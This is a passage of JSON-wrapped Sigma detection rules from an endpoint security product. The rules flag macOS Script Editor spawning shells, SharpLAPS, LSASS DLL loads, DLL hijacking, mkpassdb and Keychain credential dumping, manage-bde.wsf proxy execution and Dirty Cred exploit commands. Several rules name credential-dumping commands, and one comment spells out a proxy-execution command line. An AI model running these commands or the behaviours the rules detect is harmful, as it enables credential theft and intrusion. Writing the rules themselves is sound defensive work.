"hl_testing_start_time": "2026-03-23T11:45:34.095503Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://wojciechregula.blog/post/macos-red-teaming-initial-access-via-applescript-url/",
"https://attack.mitre.org/techniques/T1059/002/"
],
"name": "t1059_002_script_edictor_suspicious_child.yml",
"content": "title: Suspicious Program Spawned by Script Editor\nid: 8c5c44a0-e263-4023-a009-e8a1f996946c\ndescription: |\n Detects a suspicious program spawned by Script Editor.\n Script Editor is a built-in application allowing a user to create and debug Apple Script.\n Via the use of an AppleScript URL, an attacker could trick a user into executing a script encoded in the URL.\n It is recommended to investigate the spawned program to determine whether this action was legitimate.\nreferences:\n - https://wojciechregula.blog/post/macos-red-teaming-initial-access-via-applescript-url/\n - https://attack.mitre.org/techniques/T1059/002/\ndate: 2022/11/14\nmodified: 2025/01/20\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.execution\n - attack.t1569.002\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Script.AppleScript\n - classification.macOS.Behavior.InitialAccess\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n ParentImage: '/System/Applications/Utilities/Script Editor.app/Contents/MacOS/Script Editor'\n Image:\n - '/bin/sh'\n - '/bin/bash'\n - '/bin/csh'\n - '/bin/dash'\n - '/bin/ksh'\n - '/bin/tcsh'\n - '/bin/zsh'\n - '/usr/bin/python'\n - '/usr/bin/python2'\n - '/usr/bin/python3'\n - '/usr/bin/ruby'\n - '/usr/bin/perl'\n - '/usr/bin/curl'\n - '/usr/bin/plutil'\n - '/usr/bin/osascript'\n\n exclusion_sed:\n CommandLine|contains: \" | sed 's/<[^>]*>//g'\"\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8c5c44a0-e263-4023-a009-e8a1f996946c",
"rule_name": "Suspicious Program Spawned by Script Editor",
"rule_description": "Detects a suspicious program spawned by Script Editor.\nScript Editor is a built-in application allowing a user to create and debug Apple Script.\nVia the use of an AppleScript URL, an attacker could trick a user into executing a script encoded in the URL.\nIt is recommended to investigate the spawned program to determine whether this action was legitimate.\n",
"rule_creation_date": "2022-11-14",
"rule_modified_date": "2025-01-20",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1569.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8c60ec83-9f95-4dc0-9c05-23e5df43fcd3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.074814Z",
"creation_date": "2026-03-23T11:45:34.074817Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.074821Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/swisskyrepo/SharpLAPS",
"https://attack.mitre.org/techniques/T1555/"
],
"name": "t1555_sharplaps.yml",
"content": "title: Execution of SharpLAPS\nid: 8c60ec83-9f95-4dc0-9c05-23e5df43fcd3\ndescription: |\n Detects the execution of SharpLAPS, a tool used to retrieve LAPS passwords from the Active Directory.\n LAPS (Local Admin Password Solution) is a feature provided by Microsoft that automatically manages the password of a local administrator account of domain joined computers.\n An account with domain admin privileges or with ExtendedRight or Generic All Rights is required by the tool to query the relevant information from the Active Directory.\n It is recommended to analyze the parent process for suspicious activities as well as to look for other suspicious actions on the host.\n Authentication telemetry can be used to investigate any anomalous authentications as Administrator using stolen LAPS passwords.\nreferences:\n - https://github.com/swisskyrepo/SharpLAPS\n - https://attack.mitre.org/techniques/T1555/\ndate: 2023/03/20\nmodified: 2025/02/07\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1555\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.HackTool.SharpLAPS\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - OriginalFileName: 'SharpLAPS.exe'\n - InternalName: 'SharpLAPS.exe'\n\n condition: selection\nlevel: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8c60ec83-9f95-4dc0-9c05-23e5df43fcd3",
"rule_name": "Execution of SharpLAPS",
"rule_description": "Detects the execution of SharpLAPS, a tool used to retrieve LAPS passwords from the Active Directory.\nLAPS (Local Admin Password Solution) is a feature provided by Microsoft that automatically manages the password of a local administrator account of domain joined computers.\nAn account with domain admin privileges or with ExtendedRight or Generic All Rights is required by the tool to query the relevant information from the Active Directory.\nIt is recommended to analyze the parent process for suspicious activities as well as to look for other suspicious actions on the host.\nAuthentication telemetry can be used to investigate any anomalous authentications as Administrator using stolen LAPS passwords.\n",
"rule_creation_date": "2023-03-20",
"rule_modified_date": "2025-02-07",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1555"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8c69841b-27a7-42ba-a3ca-190318752de4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.612291Z",
"creation_date": "2026-03-23T11:45:34.612294Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.612302Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.sentinelone.com/labs/operation-tainted-love-chinese-apts-target-telcos-in-new-attacks/",
"https://github.com/gentilkiwi/mimikatz",
"https://attack.mitre.org/techniques/T1003/001/"
],
"name": "t1003_001_lsass_loads_dll_unknown_location.yml",
"content": "title: DLL Loaded by LSASS from Unusual Location\nid: 8c69841b-27a7-42ba-a3ca-190318752de4\ndescription: |\n Detects when a DLL is loaded by LSASS.exe from an unusual location.\n The LSASS process is responsible for authentications in Windows.\n Attackers can inject code into the LSASS process as an attempt to read credentials from its memory.\n It is recommended to analyze the loaded DLL as well as to look for signs of credential dumping on the system.\nreferences:\n - https://www.sentinelone.com/labs/operation-tainted-love-chinese-apts-target-telcos-in-new-attacks/\n - https://github.com/gentilkiwi/mimikatz\n - https://attack.mitre.org/techniques/T1003/001/\ndate: 2023/03/28\nmodified: 2026/02/27\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - attack.t1055.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.LSASSAccess\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n Image: '?:\\Windows\\System32\\lsass.exe'\n ImageLoaded|startswith: '?:\\'\n\n filter_knwon_locations:\n ImageLoaded|startswith:\n - '?:\\Windows\\WinSxS\\'\n - '?:\\Windows\\SysWoW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Program Files (x86)\\'\n - '?:\\Program Files\\'\n - '?:\\Windows\\Microsoft.NET\\'\n - '?:\\Windows\\assembly\\'\n - '?:\\Windows\\NAC\\SBS\\'\n - '?:\\{00000000-0000-0000-0000-000000000000}\\svroot\\windows\\WinSxS\\'\n - '?:\\{00000000-0000-0000-0000-000000000000}\\svroot\\windows\\SysWoW64\\'\n - '?:\\{00000000-0000-0000-0000-000000000000}\\svroot\\windows\\system32\\'\n - '?:\\{00000000-0000-0000-0000-000000000000}\\svroot\\windows\\Microsoft.NET\\'\n - '?:\\{00000000-0000-0000-0000-000000000000}\\svroot\\windows\\assembly\\'\n - '?:\\{00000000-0000-0000-0000-000000000000}\\svroot\\windows\\NAC\\SBS\\'\n - '?:\\SnapVolumesTemp\\MountPoints\\{????????-????-????-????-????????????}\\{????????-????-????-????-????????????}\\SVROOT\\Windows\\System32\\'\n\n exclusion_microsoft:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows Publisher'\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n\n exclusion_docker:\n ImageLoaded|startswith:\n - '*\\docker\\windowsfilter\\\\*\\Files\\Windows\\System32\\'\n - '*\\docker\\windowsfilter\\\\*\\Files\\Windows\\Syswow64\\'\n - '*\\docker\\data\\windowsfilter\\\\*\\Files\\Windows\\System32\\'\n - '*\\docker\\data\\windowsfilter\\\\*\\Files\\Windows\\Syswow64\\'\n\n exclusion_sandboxed:\n ImageLoaded|startswith: '\\Device\\vmsmb\\'\n\n exclusion_device_harddiskvolume:\n ImageLoaded|startswith: '\\Device\\HarddiskVolume'\n\n exclusion_nationalinstruments:\n ImageLoaded: '*\\National Instruments\\Shared\\mDNS Responder\\nimdnsNSP.dll'\n\n exclusion_ibmnerworkprovider:\n ImageLoaded|endswith: '\\IBM\\Client Access\\Shared\\cwbnetnt.dll'\n Description: 'Client Access Express Network Provider'\n OriginalFileName: 'cwbnetnt.dll'\n\n exclusion_primx:\n Signed: 'true'\n Signature: \"PRIM'X TECHNOLOGIES S.A.S.\"\n\n exclusion_quest:\n Signed: 'true'\n Signature:\n - 'QUEST SOFTWARE INC.'\n - 'QUEST SOFTWARE, INC.'\n ImageLoaded: '?:\\Windows\\BTPass\\x64\\BTPassAsm.dll'\n\n exclusion_trendmicro:\n ImageLoaded: '?:\\WINAPP64\\AVSWM\\Trend Micro\\Deep Security*\\TMExtractor64.dll'\n Signed: 'true'\n Signature: 'Trend Micro, Inc.'\n\n exclusion_mcafee:\n ImageLoaded|endswith:\n - '\\McAfee\\Endpoint Security\\Threat Prevention\\IPS\\EpMPApi.dll'\n - '\\McAfee\\Endpoint Security\\Threat Prevention\\IPS\\EpMPThe.dll'\n Signed: 'true'\n Signature:\n - 'McAfee, Inc.'\n - 'Musarubra US LLC'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8c69841b-27a7-42ba-a3ca-190318752de4",
"rule_name": "DLL Loaded by LSASS from Unusual Location",
"rule_description": "Detects when a DLL is loaded by LSASS.exe from an unusual location.\nThe LSASS process is responsible for authentications in Windows.\nAttackers can inject code into the LSASS process as an attempt to read credentials from its memory.\nIt is recommended to analyze the loaded DLL as well as to look for signs of credential dumping on the system.\n",
"rule_creation_date": "2023-03-28",
"rule_modified_date": "2026-02-27",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.001",
"attack.t1055.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8c74f503-c13c-4aac-bec6-dce34f0e3ae4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.090805Z",
"creation_date": "2026-03-23T11:45:34.090807Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.090811Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_presentationhost.yml",
"content": "title: DLL Hijacking via presentationhost.exe\nid: 8c74f503-c13c-4aac-bec6-dce34f0e3ae4\ndescription: |\n Detects potential Windows DLL Hijacking via presentationhost.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'presentationhost.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CRYPTBASE.DLL'\n - '\\mscoree.dll'\n - '\\urlmon.dll'\n - '\\version.dll'\n - '\\WININET.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8c74f503-c13c-4aac-bec6-dce34f0e3ae4",
"rule_name": "DLL Hijacking via presentationhost.exe",
"rule_description": "Detects potential Windows DLL Hijacking via presentationhost.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8c815a1b-f4b0-4ebd-abec-692d10353642",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.617095Z",
"creation_date": "2026-03-23T11:45:34.617098Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.617106Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1555/005/"
],
"name": "t1564_001_creds_dump_mkpassdb.yml",
"content": "title: Credentials Dumped via mkpassdb\nid: 8c815a1b-f4b0-4ebd-abec-692d10353642\ndescription: |\n Detects the usage of mkpassdb to dump credentials.\n Adversaries may dump credentials to use them for lateral movement.\n It is recommended to check for other suspicious activities by the parent process.\nreferences:\n - https://attack.mitre.org/techniques/T1555/005/\ndate: 2024/07/22\nmodified: 2025/03/07\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1555.005\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.CredentialAccess\nlogsource:\n product: macos\n category: process_creation\ndetection:\n selection:\n ProcessName: 'mkpassdb'\n CommandLine|contains: '-dump'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8c815a1b-f4b0-4ebd-abec-692d10353642",
"rule_name": "Credentials Dumped via mkpassdb",
"rule_description": "Detects the usage of mkpassdb to dump credentials.\nAdversaries may dump credentials to use them for lateral movement.\nIt is recommended to check for other suspicious activities by the parent process.\n",
"rule_creation_date": "2024-07-22",
"rule_modified_date": "2025-03-07",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1555.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8c870c23-e2f8-4774-86d6-12106f4109c9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.074945Z",
"creation_date": "2026-03-23T11:45:34.074947Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.074951Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Scripts/Manage-bde/",
"https://attack.mitre.org/techniques/T1216/"
],
"name": "t1216_manage_bde_wsf_post_exec.yml",
"content": "title: Binary Hijacked via manage-bde.wsf\nid: 8c870c23-e2f8-4774-86d6-12106f4109c9\ndescription: |\n Detects the execution of the manage-bde.wsf script to execute a fake manage-bde.exe.\n When the manage-bde.wsf script is run, it will try to execute manage-bde.exe by first looking in the current directory.\n Attackers may put a malicious manage-bde.exe in any directory they have write access to, and execute the manage-bde.wsf to proxy the execution of their payload.\n The manage-bde.wsf script, used to manage BitLocker, has been deprecated since Windows 7 and manage-bde.exe should be used instead.\n It is recommended to investigate the process that ran the cscript.exe process, as well as the manage-bde.exe process.\nreferences:\n - https://lolbas-project.github.io/lolbas/Scripts/Manage-bde/\n - https://attack.mitre.org/techniques/T1216/\ndate: 2022/01/27\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1216\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Manage-bde\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # copy c:\\users\\person\\evil.exe c:\\users\\public\\manage-bde.exe & cd c:\\users\\public\\ & cscript.exe c:\\windows\\system32\\manage-bde.wsf\n selection:\n GrandparentImage|endswith: '\\cscript.exe'\n GrandparentCommandLine|contains: 'manage-bde.wsf'\n ParentImage|contains: 'cmd.exe'\n Image|endswith: '\\manage-bde.exe'\n CommandLine|contains: '-legacy_Vista'\n\n filter_legitimate_manage_bde:\n Image: '?:\\Windows\\System32\\manage-bde.exe'\n\n condition: selection and not 1 of filter_*\nlevel: critical\n#level: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8c870c23-e2f8-4774-86d6-12106f4109c9",
"rule_name": "Binary Hijacked via manage-bde.wsf",
"rule_description": "Detects the execution of the manage-bde.wsf script to execute a fake manage-bde.exe.\nWhen the manage-bde.wsf script is run, it will try to execute manage-bde.exe by first looking in the current directory.\nAttackers may put a malicious manage-bde.exe in any directory they have write access to, and execute the manage-bde.wsf to proxy the execution of their payload.\nThe manage-bde.wsf script, used to manage BitLocker, has been deprecated since Windows 7 and manage-bde.exe should be used instead.\nIt is recommended to investigate the process that ran the cscript.exe process, as well as the manage-bde.exe process.\n",
"rule_creation_date": "2022-01-27",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1216"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8c9d264e-3309-4fe1-98a9-2fc7bb414f7b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.608351Z",
"creation_date": "2026-03-23T11:45:34.608354Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.608362Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1555/001/"
],
"name": "t1555_001_login_keychain_access.yml",
"content": "title: Access to macOS Login Keychain\nid: 8c9d264e-3309-4fe1-98a9-2fc7bb414f7b\ndescription: |\n Detects an access to the macOS Login Keychain.\n Keychain (or Keychain Services) is the macOS credential management system.\n Attackers may access the macOS Login Keychain to gather user credentials or the location of its database.\n It is recommended to ensure that the process accessing this file is legitimate.\nreferences:\n - https://attack.mitre.org/techniques/T1555/001/\ndate: 2022/11/18\nmodified: 2024/03/12\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1555.001\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.CredentialAccess\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n # security login-keychain\n Image: '/usr/bin/security'\n CommandLine|contains: ' login-keychain'\n\n exclusion_duo_desktop:\n ParentImage: '/Applications/Duo Desktop.app/Contents/MacOS/Duo Desktop'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8c9d264e-3309-4fe1-98a9-2fc7bb414f7b",
"rule_name": "Access to macOS Login Keychain",
"rule_description": "Detects an access to the macOS Login Keychain.\nKeychain (or Keychain Services) is the macOS credential management system.\nAttackers may access the macOS Login Keychain to gather user credentials or the location of its database.\nIt is recommended to ensure that the process accessing this file is legitimate.\n",
"rule_creation_date": "2022-11-18",
"rule_modified_date": "2024-03-12",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1555.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8c9d9dc3-9906-4f86-b62d-fbf0e6898430",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.619470Z",
"creation_date": "2026-03-23T11:45:34.619472Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.619477Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://access.redhat.com/security/cve/cve-2022-2588",
"https://github.com/Markakd/CVE-2022-2588",
"https://attack.mitre.org/techniques/T1068/"
],
"name": "t1068_dirty_cred_poc.yml",
"content": "title: Possible Exploitation of Dirty Cred\nid: 8c9d9dc3-9906-4f86-b62d-fbf0e6898430\ndescription: |\n Detects common exploits and proof-of-concepts for the Linux Dirty Cred vulnerability (CVE-2022-2588).\n This vulnerability resides in the network packet scheduler implementation in the Linux kernel which does not properly remove all references to a route filter before freeing it in some situations.\n A local attacker can exploit this to cause a denial of service (system crash) or execute arbitrary code.\n It is recommended to determine if this action comes from internal tests and if not, to launch an investigation into the breach.\nreferences:\n - https://access.redhat.com/security/cve/cve-2022-2588\n - https://github.com/Markakd/CVE-2022-2588\n - https://attack.mitre.org/techniques/T1068/\ndate: 2022/10/07\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1068\n - cve.2022-2588\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Exploit.CVE-2022-2588\n - classification.Linux.Exploit.DirtyCred\n - classification.Linux.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection_cmd1:\n CommandLine|endswith: 'rm -rf exp_dir; mkdir exp_dir; touch exp_dir/data'\n\n selection_cmd2:\n ParentCommandLine|endswith: 'rm -rf exp_dir; mkdir exp_dir; touch exp_dir/data'\n CommandLine:\n - 'rm -rf exp_dir'\n - 'mkdir exp_dir'\n - 'touch exp_dir/data'\n\n condition: 1 of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8c9d9dc3-9906-4f86-b62d-fbf0e6898430",
"rule_name": "Possible Exploitation of Dirty Cred",
"rule_description": "Detects common exploits and proof-of-concepts for the Linux Dirty Cred vulnerability (CVE-2022-2588).\nThis vulnerability resides in the network packet scheduler implementation in the Linux kernel which does not properly remove all references to a route filter before freeing it in some situations.\nA local attacker can exploit this to cause a denial of service (system crash) or execute arbitrary code.\nIt is recommended to determine if this action comes from internal tests and if not, to launch an investigation into the breach.\n",
"rule_creation_date": "2022-10-07",
"rule_modified_date": "2025-04-14",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1068"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8ca3659e-81fe-487c-9ecf-80da110acec4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T10:57:06.360476Z",
"creation_date": "2026-03-23T11:45:35.295688Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.295695Z",
